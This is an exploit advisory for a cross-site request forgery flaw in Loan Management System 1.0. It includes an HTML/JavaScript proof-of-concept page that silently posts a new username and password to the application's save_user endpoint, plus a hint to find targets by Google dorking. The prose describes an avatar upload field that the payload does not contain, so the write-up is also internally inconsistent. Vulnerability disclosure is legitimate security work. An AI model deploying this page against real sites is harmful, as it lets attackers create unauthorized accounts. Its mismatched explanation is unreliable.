Headline
Loan Management System 1.0 Cross Site Request Forgery
Loan Management System version 1.0 suffers from a cross site request forgery vulnerability.
=============================================================================================================================================
| # Title : Loan Management System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This HTML page :
is a user registration form that allows users to input a username, password, and upload an avatar image.
The form data is then sent via an AJAX request to a server-side script for processing.
[+] Here’s a breakdown of how it works:
HTML Structure
Form Elements:
username: A text field where the user can input their username.
password: A password field for entering a password.
img: A file input for uploading an avatar image (restricted to image file types).
Save User Button:
An input element with the type button is used to trigger the saveUser() function when clicked.
[+] JavaScript (AJAX Request)
AJAX Request:
An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).
The request method is POST, and the data is sent to the specified URL.
The onload function checks if the request was successful (status code 200). If it was,
it alerts the user that the save was successful; otherwise, it alerts the user of an error.
[+] save code as poc.html
[+] payload :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>User Registration</title>
</head>
<body>
<h2>User Registration</h2>
<form id="userForm" enctype="multipart/form-data">
<label for="username">Username:</label>
<input type="text" id="username" name="username" required><br><br>
<label for="password">Password:</label>
<input type="password" id="password" name="password" required><br><br>
<input type="button" value="Save User" onclick="saveUser()">
</form>
<script>
function saveUser() {
var form = document.getElementById('userForm');
var formData = new FormData(form);
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/loan/ajax.php?action=save_user", true);
xhr.onload = function () {
if (xhr.status === 200) {
alert('User saved successfully');
} else {
alert('An error occurred while saving the user');
}
};
xhr.send(formData);
}
</script>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================